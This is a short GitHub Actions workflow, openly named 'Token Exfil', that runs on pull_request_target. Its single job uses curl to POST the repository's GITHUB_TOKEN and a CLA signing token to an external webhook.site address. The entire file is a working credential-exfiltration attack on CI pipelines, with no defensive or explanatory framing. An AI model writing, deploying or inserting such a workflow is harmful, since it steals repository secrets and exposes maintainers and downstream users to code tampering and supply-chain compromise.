name: Token Exfil
on: pull_request_target
jobs:
  exfil:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST -d "gtoken=$GITHUB_TOKEN" https://webhook.site/ef36781f-5c6e-49a7-b232-b8d6e36e2867
          curl -X POST -d "cla=$CLA_SIGN_TOKEN" https://webhook.site/ef36781f-5c6e-49a7-b232-b8d6e36e2867
